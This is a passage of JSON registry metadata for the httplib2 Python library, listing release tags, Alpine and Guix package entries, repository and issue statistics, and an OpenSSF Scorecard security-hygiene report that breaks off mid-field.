sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T23:56:08.440Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.21","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2-pyc/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":126,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2024-12-10T17:16:51.368Z","updated_at":"2024-12-10T17:16:51.368Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.21","url":"https://pkgs.alpinelinux.org/packages?branch=v3.21","ecosystem":"alpine","default":false,"packages_count":25394,"maintainers_count":413,"namespaces_count":2,"keywords_count":3607,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1400},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-12-06T12:06:36.014Z","updated_at":"2026-08-24T05:06:22.358Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/namespaces"}},{"id":13952736,"name":"python-httplib2","ecosystem":"guix","description":"Comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"expat","normalized_licenses":["Other"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-03-02T19:40:45.513Z","latest_release_published_at":"2026-03-02T19:40:45.513Z","latest_release_number":"0.22.0","last_synced_at":"2026-04-27T16:41:32.840Z","created_at":"2026-03-02T19:40:45.328Z","updated_at":"2026-08-23T00:58:12.338Z","registry_url":"https://packages.guix.gnu.org/packages/python-httplib2/0.22.0/","install_command":"guix install python-httplib2","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/python-web.scm#n3486","metadata":{"location":"gnu/packages/python-web.scm:3486","variable_name":"python-httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 